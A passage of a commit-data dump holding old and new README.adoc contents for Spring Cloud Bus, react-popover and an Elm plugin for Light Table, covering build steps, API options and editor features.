See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for Maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. 
Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","old_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\n= Spring Cloud Bus\n\nSpring Cloud Bus links nodes of a distributed system with a lightweight message broker. This can then be used to broadcast state changes (e.g. configuration changes) or other management instructions. A key idea is that the Bus is like a distributed Actuator for a Spring Boot application that is scaled out, but it can also be used as a communication channel between apps. The only implementation currently is with an AMQP broker as the transport, but the same basic feature set (and some more depending on the transport) is on the roadmap for other transports.\n\n\n== Quick Start\n\nSpring Cloud Bus works by adding Spring Boot autconfiguration if it detects itself on the classpath. All you need to do to enable the bus is to add `spring-cloud-starter-bus-amqp` or `spring-cloud-starter-bus-kafka` to your dependency management and Spring Cloud takes care of the rest. Make sure the broker (RabbitMQ or Kafka) is available and configured: running on localhost you shouldn't have to do anything, but if you are running remotely use Spring Cloud Connectors, or Spring Boot conventions to define the broker credentials, e.g. for Rabbit\n\n.application.yml\n----\nspring:\n rabbitmq:\n host: mybroker.com\n port: 5672\n username: user\n password: secret\n----\n\nThe bus currently supports sending messages to all nodes listening or all nodes for a particular service (as defined by Eureka). More selector criteria may be added in the future (ie. only service X nodes in data center Y, etc...). There are also some http endpoints are under the `\/bus\/*` actuator namespace. There are currently two implemented. The first, `\/bus\/env`, sends key\/values pairs to update each nodes Spring Environment. 
The second, `\/bus\/refresh`, will reload each application's configuration, just as if they had all been pinged on their `\/refresh` endpoint.\n\nNOTE: the Bus starters cover Rabbit and Kafka, because those are the two most common implementations, but Spring Cloud Stream is quite flexible and binder will work combined with `spring-cloud-bus`.\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. 
If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. 
If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3496a179f26275223204be1e972e489b60960c65","subject":"Update README.adoc","message":"Update README.adoc\n\nFormatting","repos":"littlebits\/react-popover,rainforestapp\/react-popover,gregory90\/react-popover,derekr\/react-popover,clara-labs\/react-popover,t3chnoboy\/react-popover,prayogoa\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"# react-popover\n:toc: macro\n\nA specification backed popover for react. link:https:\/\/littlebits.github.io\/react-popover\/build[Live demo].\n\n\ntoc::[]\n\n\n## Installation\n\n----\nnpm install react-popover\n----\n\n\n## Examples\n\nThe `examples` folder contains basic applications of this component. To try them locally run `npm start`.\n\n\n## API\n\n##### `export default` `Popover(props, target)`\n\n##### `props : {...}`\n\n##### `body : Node | Array Node`\nThe `popover` content. Content is rooted (becomes children of) `.Popover-body` and thus `body` can be a single `node` _or an array of `nodes`_.\n\n##### `isOpen : Boolean`\nDetermines Whether or not the popover is rendered.\n\n##### `preferPlace : String | Null`\nSets a *preference* of where to position the Popover. Only useful to specify placement in case of multiple available fits. Defaults to `null`. Valid values are:\n\n* `above | right | bottom | left` Prefer an explicit side.\n* `row | column` Prefer an orientation.\n* `start | end` Prefer an order.\n* `null` No preference, automatic resolution. This is the default.\n\n##### `onOuterAction : Function`\nA callback function executed every time the user does an action (`mousedown` or `touchstart`) outside the DOM tree of both `Popover` and `Target`. A canonical use-case is to automatically close the Popover on any external user action.\n* Plus support for standard props...: `className`, `style`\n\n##### `target : React Element`\n\n- The React Element that this popover will orient itself around. `target` `rendering tree` is unaffected. `Popover` _will_ become its `owner`.\n","old_contents":"# react-popover\n:toc: macro\n\nA specification backed popover for react. link:https:\/\/littlebits.github.io\/react-popover\/build[Live demo].\n\n\ntoc::[]\n\n\n## Installation\n\n----\nnpm install react-popover\n----\n\n\n## Examples\n\nThe `examples` folder contains basic applications of this component. 
To try them locally run `npm start`.\n\n\n## API\n\n#### `export default` `Popover(props, target)`\n\n##### `props : {...}`\n\n- `body : Node || Array Node`: The `popover` content. Content is rooted (becomes children of) `.Popover-body` and thus `body` can be a single `node` _or an array of `nodes`_.\n- `isOpen : Boolean`: Determines Whether or not the popover is rendered.\n- `preferPlace : String | Null`: Sets a *preference* of where to position the Popover. Only useful to specify placement in case of multiple available fits. Defaults to `null`. Valid values are:\n-- `above | right | bottom | left` Prefer an explicit side.\n-- `row | column` Prefer an orientation.\n-- `start | end` Prefer an order.\n-- `null` No preference, automatic resolution. This is the default.\n- `onOuterAction : Function` : A callback function executed every time the user does an action (`mousedown` or `touchstart`) outside the DOM tree of both `Popover` and `Target`. A canonical use-case is to automatically close the Popover on any external user action.\n- Plus support for standard props...: `className`, `style`\n\n##### `target : React Element`\n\n- The React Element that this popover will orient itself around. `target` `rendering tree` is unaffected. `Popover` _will_ become its `owner`.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d81c44935523b18d24ee9a8a9f775d2c94cc21ef","subject":"Clarify keyboard shortcut for both lint and format","message":"Clarify keyboard shortcut for both lint and format\n","repos":"rundis\/elm-light,rundis\/elm-light","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Elm LightTable plugin\nElm language plugin for Light Table\nv0.1.2, 2015-11-19: published\n:library: Asciidoctor\n:numbered:\n:idprefix:\n:toc: macro\n\n\nhttp:\/\/elm-lang.org\/[Elm] language plugin for Light Table\n\n\n== Installation\nInstall using the Light Table plugin manager.\nAlternatively you can clone it into `$LT_USER_HOME\\\plugins`.\n\n\n== Preconditions\n* **LightTable 0.8-alpha or higher is required**\n* You will need to have the http:\/\/elm-lang.org\/install[elm-platform] (there is also an npm installer out there) installed and the following should be in your path:\n** https:\/\/github.com\/elm-lang\/elm-reactor[elm-reactor]\n** https:\/\/github.com\/elm-lang\/elm-make[elm-make]\n** https:\/\/github.com\/elm-lang\/elm-package[elm-package]\n** https:\/\/github.com\/elm-lang\/elm-repl[elm-repl]\n* For all commands\/features you will need to have a project folder with an `elm-package.json` file\n\n\nNOTE: Tested with elm 0.16.0 on OS\/X 10.9.5, Ubuntu 14.04 and Windows 10.\n\n== Resources\n* http:\/\/rundis.github.io\/blog\/2015\/elm_light.html[ScreenCast] - Demo of the features available in the first release of the plugin\n* http:\/\/elm-lang.org\/[elm-lang.org] - The home of Elm\n* https:\/\/github.com\/LightTable\/LightTable[Light Table] - GitHub home of Light Table\n\n== Overview\n\n=== Elm client\nFor pretty much any operation this plugin supports, you need an elm client connection. An elm client connection\nis a small node process that the plugin typically will spawn automatically for any action that requires an elm client.\n\n.When the elm-client starts, it:\n. Opens an elm-repl\n. Starts (and listens) to elm-reactor\n. 
Listens for commands from light table (eval, docs, autocompletions etc)\n\n\n.You may also manually connect to an elm project using the connect bar in Light Table\n* Invoke the command: `Connect: Add Connection`\n* Select **Elm** from the list of client types\n* If all goes well you will get a confirmation in the status bar that the project is connected\n\n\n.To disconnect\n* Invoke the command `Connect: Show connect bar`\n* Find the project in the list and click disconnect\n\nThe client connections are named after the directory containing the elm-package.json\n\n=== Elm project\nIn the future the plugin might add support for getting started with just a simple .elm file, but you very quickly\nend up having to add some config, especially an elm-package.json. So as mentioned in the preconditions, you will need one.\n\n\n.How does elm-light determine the project ?\n\nSay you have a project with the following structure\n\n[source]\n----\n\/home\/myuser\/projects\/hello-elm\/elm-package.json\n\/home\/myuser\/projects\/hello-elm\/hello.elm\n\/home\/myuser\/projects\/hello-elm\/src\/util.elm\n----\n\n\n* If you start off with evaluating hello.elm, the plugin will start looking for an elm-package.json in the same directory\nas the hello.elm file resides. So the elm client will use `\/home\/myuser\/projects\/hello-elm` as root path and the project is assumed to be `hello-elm`\n* If you start off with evaluating util.elm, it will start looking for an `elm-package.json` in the `src` folder, and if it doesn't find one it will try the parent directory (and recurse until one is found or none can be found).\nHence the root path and project name will be the same\n* If you (with the elm-client still running) later add a .elm file anywhere below `\/home\/myuser\/projects\/hello-elm` and eval or lint (or whatever) on it, the plugin\nwill assume it belongs to the same elm-client and use that.\n\n\n=== A few disclaimers\/general notes\n* If an operation takes some time to respond, it might be because elm is installing packages (first time or you've changed the elm-package.json file)\n* If stuff doesn't work and you don't get anything sensible indicating why not, it's worth trying to remove the folder elm-stuff and run `elm-package install`\nat the command line to see if packages install correctly (I've experienced that it's not always reliable...)\n\n\n== Usage\n\n=== Linting\nimage::lint.png[width=500]\n\nTo lint an elm file use the command: `Elm: Lint selected file`\n\n* Errors are marked with red underline, warnings with yellow underline\n* Errors\/warnings in dependent files are shown in the console\n\n==== Details and navigation\n* To view details about an error or warning place your cursor inside an underline range and select the\ncommand `Linter: Show details at cursor`\n* To move to next lint result select command `Linter: Move to next result`\n* To move to previous lint result select command `Linter: Move to previous result`\n\n\nNOTE: Remember to save. 
Linting works on saved files !\n\n\n----\nTIP: Linting on save\nIf you wish to lint on save just add the following to your user behaviors\n\n[:editor.elm :lt.objs.editor.file\/on-save :elm.lint]\n----\n\n\n=== Make (to js)\nTo run make for your elm file\/project use the command: `Elm: Make selected file`\nA .js file is generated in the same directory where the .elm file resides.\nErrors and warnings are handled similarly to linting.\n\n\n=== Testing\n[cols=\"1a,1a\"]\n|===\n\n| image::browsertests.png[width=400, role=\"thumb\"]\n| image::consoletests.png[width=400]\n|===\n\n.Preconditions\nThe plugin comes bundled with the https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test] node package. It's slightly\nmodified to ensure that it uses the node instance that comes bundled with Light Table.\nSo you **don't** need to install node-elm-test !\n\nOf course you can run browser-based tests without problems. The great benefit of using the console runner is that these tests can also be run as part of a CI build.\n\n\n\n==== Quick start\nThe plugin has a feature to create a test skeleton subproject. From any (non-test) elm file:\n\n. Invoke the command `Elm: Add test subproject to current project`\n. The plugin will:\n.. Create a test directory\n.. Create an elm-package.json file based on the elm-package.json file in your current project. It will add dependencies\nto https:\/\/github.com\/deadfoxygrandpa\/Elm-Test[elm-test] and https:\/\/github.com\/laszlopandy\/elm-console[elm-console].\nIt will also set up source directories for your test project to include any source directories set up for your root project\n.. It will add a sample console TestRunner.elm and a sample Tests.elm\n.. Finally it will run elm-package install to set you up to run your tests quickly later on (this may take a little while the first time)\n. Now you have a great starting point to start writing tests and running them\n\n\n==== Running tests\n. Open a test file\n. Select the command `Elm: Test current file`\n. One of two outcomes will occur:\n.. If the test is considered a console test (contains \"consoleRunner\" or \"Console\"); the tests are run using https:\/\/github.com\/rtfeldman\/node-elm-test[node-elm-test].\nResults are shown in the console. In case of errors a message is displayed in the status bar\n.. If not a console test, the test is assumed to be a browser\/element test and the file is opened in the inline browser (backed by elm-reactor). Tests are run and results are shown using elm-test's elementRunner (or stringRunner if that's what you are using)\n\n\nNOTE: The first time you run a browser test, you might need to reload the page as the reactor might not have completed starting before\nthe tests run (and hence the test file hasn't completed compiling yet). After that it's just a matter of changing tests and reloading (`ctrl-r`)\n\n\n\n\n=== Language docs\n.From an elm file\n* Select the command: Docs: Search language docs (ctrl-shift-d)\n* Enter search criteria\n* Behold the results\n\nNOTE: Doc search currently picks a random elm file as the basis for search. And uses\nhttps:\/\/github.com\/ElmCast\/elm-oracle[elm-oracle] behind the scenes. 
Elm oracle is bundled with the plugin btw.\n\n=== Inline doc\n* With the cursor over something docable press ctrl+d.\n* Inline documentation is displayed (or an error message is shown on the status bar)\n* Ctrl+d again to close the inline doc\n\nNOTE: Only functions that are available through imports (explicit + elm defaults) are docable\n\n=== Autocomplete (incubating)\nOnce an elm editor has a connection (through use of linting, make, inline doc etc)\nthe autocompleter kicks in (sort of (: ).\n\nIt should kick in when you type something (like Signa ... should show completions from Signal etc)\n\n\n.To turn it off (and optionally turn on text hints) just edit your __User behaviors__\n[source,clojure]\n----\n [:editor.elm -:lt.plugins.elm-light\/use-local-hints] ; Turn off the autocompleter\n [:editor.clj :lt.plugins.auto-complete\/textual-hints] ; Enable textual hints again\n----\n\n\n\n\n=== Editor repl\nOnce connected to an elm-project in Light Table, a repl is started running in the background.\nThis means you can evaluate statements from within any given elm editor.\n\n* In an elm file:\n* Position the cursor within the region of a top level expression and press `cmd+enter`.\n* You may also select a region that consists of one or more top level statements and press `cmd+enter`\n** **However** results are shown next to the first line of the selection, even though the actual result might be related to the\n last statement (or if an error, whatever line caused the error)\n* results are shown inline\n\n\nYou may reset the repl to start with a clean slate. Just select the command: `Elm: Restart repl for current project`\n\nNOTE: Results are currently only shown sensibly if you eval one top level statement at a time. Also the repl is shared\nbetween all elm editors for a given project.\n\n=== \"Anonymous\" repl\nYou may also create a repl that isn't backed by a file\n* Select the command `Elm repl: Open a elm repl`\n* You may now eval code as for an Editor repl\n\nNOTE: You need a connected elm project for this to work\n\n\n=== Elm-Reactor\nWhen you connect an elm project, elm-reactor is started in the background.\nTo support multiple projects running in parallel, each project's elm-reactor gets a port from the port-range (3000 - 4000)\n\nConvenience commands have been added to view an elm file in the Light Table internal browser.\n\n.Either\n* Select the command `Elm: View current elm file in browser (elm-reactor)`\n* or `Elm: View current elm file in browser with debugger (elm-reactor)` if you wish the debugger panel opened by default\n\n\nTIP: If you get a blank page (and\/or an error in the console about the address not being available), it might be\nbecause elm-reactor is running make in the background. You might need to be patient and refresh the browser (`cmd+r` for Mac)\n\nWARNING: On Mac the elm-reactor starts two processes. You may experience occasions where the plugin is unable\nto terminate both of these subprocesses appropriately for now. To be improved.\nYou may close connections by using the command `Connect: Show connect bar` and click disconnect for your elm project\n\n
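If you're unsure whether the reactor for your project is actually up, you can also hit it from a terminal. The port below is just an example from the 3000 - 4000 range mentioned above:\n\n[source]\n----\n$ curl -I http:\/\/localhost:3000\/\n----\n\n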
=== Package management\nThe plugin has an interface for doing some handy package-related tasks. It's basically a thin wrapper over\nthe elm-package command with a UI to give you a better overview.\n\nimage::elm-light-pkgs.png[width=500]\n\n==== Open package manager\nFrom an editor with any file under your project, select the command `Elm: Show project packages`\n\nNOTE: You need to have a working network connection, as it retrieves package info from the central elm package repository\n\n\n==== Add a new package\n* Search for a given package in the section for adding packages\n* Use up\/down arrows to navigate the dropdown\n* Use enter to select the package you wish to add\n* Select the version of the package you wish to install\n* Click `Add package`\n* Check the status bar\/console log for feedback on progress and success\/failure\n* If all goes well the view of packages gets updated (as will your elm-package.json file in the background)\n\nNOTE: The feedback from elm-package install is not always the most helpful when there are problems. Sometimes\nit even reports success when nothing has been done. Check out the GitHub repo for elm-package for follow-up on issues\nrelated to this. Be advised that a package listed with the `exact` column empty means something didn't go well,\neven though elm-package might have reported success.\n\n==== Remove package\nYou can remove packages that are specified in your elm-package.json.\n\n* Click on the `remove` button\nnext to the package in the listing.\n* Your elm-package.json file will get updated\n* elm-package install is invoked to clean up\n* The listing will be updated (with potential transitive deps removed too)\n\n==== Handling other cases\nSometimes you need to edit your `elm-package.json` file directly for elm-package to know what to do.\nThere might also be the case that you have defined an `elm-package.json` but haven't yet invoked any elm command\nthat resulted in a package install. For such cases the `Refresh packages` button comes in handy !\n\n==== Package docs\nFor any packages installed (with an exact version) you may view the online docs:\n\n* In the list click on the package name\n* A LT browser tab is opened (or focused if one already exists) and the package doc for the selected package\nis displayed\n\n\n=== Dependency graph\n\nimage::elm-dep-graph.png[width=800]\n\nYou may view an inline dependency graph of your project dependencies.\n\n.Either\n* From any file under your project root invoke the command `Elm: Show dependency graph`\n* Alternatively click the `Show dependency graph` button from the package viewer\n\n.Additional info\n* Dashed arrows represent transitive dependencies\n* If you hover over a dependency you will see a short package summary\n* Dependencies found in elm-package.json that `elm-package` failed to install will\nbe shown with a red color\n* When you update packages in the package viewer, the graph is automatically refreshed\n\n\n\nNOTE: You will need an internet connection for this to work (uses package.elm.lang.org)\n\n=== Elm format\nIn an effort to standardize how Elm code should be formatted, https:\/\/github.com\/avh4\/elm-format[elm-format] was\ncreated. It is still in alpha, but I figured you might just as well start playing with it.\n\n.Precondition\nYou will need to install elm-format and make sure the executable is available in your path for it to work from\nthe plugin. 
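A quick sanity check from a terminal (assuming a unix-like shell) could look like:\n\n[source]\n----\n$ which elm-format\n----\n\n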
You'll find install instructions on the https:\/\/github.com\/avh4\/elm-format[elm-format] readme.\n\n\n.Format editor contents\n* With an elm file open, select the command `Elm: Format editor contents`\n* If there are no errors, the whole editor is formatted (but any format changes aren't saved)\n* If there are any errors (typically syntax errors), a message is shown in the status bar and details can be found in the console\n\n\n.Format top level expression\nIf for some reason you find yourself wanting to just format a top level expression, this is the command for you.\n\n* Place the cursor somewhere within the top level expression you wish to format\n* Select the command `Elm: Format top level expression at point`\n\n\n.Format a file\n* With an elm file open, select the command `Elm: Format file`\n\nWARNING: Any unsaved changes will be lost when running this command. This command updates the file backing the editor\nin question.\n\n\n\n.Adding keyboard shortcuts\n[source,clojure]\n----\n\n [:editor.elm.common \"cmd-shift-l\" :elm-format-expression]\n [:editor.elm.common \"cmd-ctrl-l\" :elm-format-buffer]\n----\n\n\n----\nTIP: Format and Lint on save\nIf you wish to format and lint on every save just add the following to your user keymap\n\n```[:editor.elm \"ctrl-s\" :save :elm-format :elm.lint]```\n\nHowever if you added linting on save to your user behaviors, you would want to remove that, otherwise you'll\nbe double-linting !\n----\n\n\n\n\n=== Note on editor commands\n\n\n==== Select top-level statements\nIf you wish to select a top level statement just invoke the command `Elm: Select top level expression from current expression`\n\nNOTE: The selection algorithm is sort of naive, so there might be cases when the selection doesn't work out quite as you'd hope.\nIn most cases it should work sensibly though.\n\n\n.To enable as keyboard shortcut in both elm editors and anonymous elm repl\n[source,clojure]\n----\n [:editor.elm.common \"alt-shift-s\" :elm.select.top.level] ; modify keybinding to your liking !\n----\n\n\n== Contributing\nPull requests are most welcome. Please do not include the transpiled files (*_compiled*) in the PR.\n\n== History\n* 0.3.4 Updated to support elm-format 0.2-alpha\n** Added format buffer (keeps unsaved changes) and format expression commands\n* 0.3.3 Fix compatibility with LT 0.8.1. Also tweaked the autocompletion to be a little faster and more accurate.\n* 0.3.2 Module-aware autocomplete and remove leading pipes from repl results\n* 0.3.1 Added an inline project dependency graph (using d3)\n* 0.3.0 Added Windows support. See GitHub release notes for details\n* 0.2.0 Improved linting, introduced test support and support for elm-format\n* 0.1.3 Bugfix: Forgot to include react.js (used for rendering package UI)\n* 0.1.2 Package manager and 0.16.0 fix\n** UI for managing your project packages.\n** 0.16.0 fix: Remove ANSI color codes from errors and warnings shown inline\n* 0.1.1 Maintenance release:\n** Feature to select top level expressions\n** Eval in repl with no selection automatically selects top level expression based on cursor position\n** Syntax highlight multiline strings `\"\"\"`\n** Allow user to select to browse file in reactor with or without debugger\n** Fix: Allow reuse of released reactor ports\n** Add tag :editor.elm.common to allow users to configure common behaviors\/commands for repl and editors more easily\n* 0.1.0 Initial release\n\n== License\nMIT, same as Light Table. 
See LICENSE.md for details.\n\n\n\n\n\n\n\n\n\n","old_contents":"= Elm LightTable plugin\nElm language plugin for Light Table\nv0.1.2, 2015-11-19: published\n:library: Asciidoctor\n:numbered:\n:idprefix:\n:toc: macro\n\n\nhttp:\/\/elm-lang.org\/[Elm] language plugin for Light Table\n\n\n== Installation\nInstall using the Light Table plugin manager.\nAlternatively you can clone it into `$LT_USER_HOME\\plugins`.\n\n\n== Preconditions\n* **LIghtTable 0.8-alpha or higher is required**\n* You will need to have the http:\/\/elm-lang.org\/install[elm-platform] (there is also a npm installer out there) installed and the following should be in your path:\n** https:\/\/github.com\/elm-lang\/elm-reactor[elm-reactor]\n** https:\/\/github.com\/elm-lang\/elm-make[elm-make]\n** https:\/\/github.com\/elm-lang\/elm-package[elm-package]\n** https:\/\/github.com\/elm-lang\/elm-repl[elm-repl]\n* For all commands\/features you will need to have a project folder with a `elm-package.json` file\n\n\nNOTE: Tested with elm 0.16.0 on OS\/X 10.9.5, Ubuntu 14.04 and Windows 10.\n\n== Resources\n* http:\/\/rundis.github.io\/blog\/2015\/elm_light.html[ScreenCast] - Demo of the features available in the first release of the plugin\n* http:\/\/elm-lang.org\/[elm-lang.org] - The home of Elm\n* https:\/\/github.com\/LightTable\/LightTable[Light Table] - GithHub home of Light Table\n\n== Overview\n\n=== Elm client\nFor pretty much any operation this plugin you support you need an elm client connection. An elm client connection\nis a small node process that the plugin typically will spawn automatically for any action that requires a elm client.\n\n.When the elm-client starts it;\n. Opens an elm-repl\n. Starts (and listens) to elm-reactor\n. Listens for commands from light table (eval, docs, autocompletions etc)\n\n\n.You may also manually connect to an elm project using the connect bare in Light Table\n* Invoke the command: `Connect: Add Connection`\n* Select **Elm** from the list of client types\n* If all goes well you will get a confirmation in the status bar that the project is connected\n\n\n.To disconnect\n* Invoke the command `Connect: Show connect bar`\n* Find the project in the list and click disconnect\n\nThe client connectionns is named after the the directory containing the elm-package.json\n\n=== Elm project\nIn the future the plugin might add support for geting started with just a simple .elm file, but you very quickly\nend up having to add some config especially a elm-package.json. So as mentioned in the preconditions, you will need one.\n\n\n.How does elm-light determine the project ?\n\nSay you have a project with the following structure\n\n[source]\n----\n\/home\/myuser\/projects\/hello-elm\/elm-package.json\n\/home\/myuser\/projects\/hello-elm\/hello.elm\n\/home\/myuser\/projects\/hello-elm\/src\/util.elm\n----\n\n\n* If you start of with evaluating hello.elm, 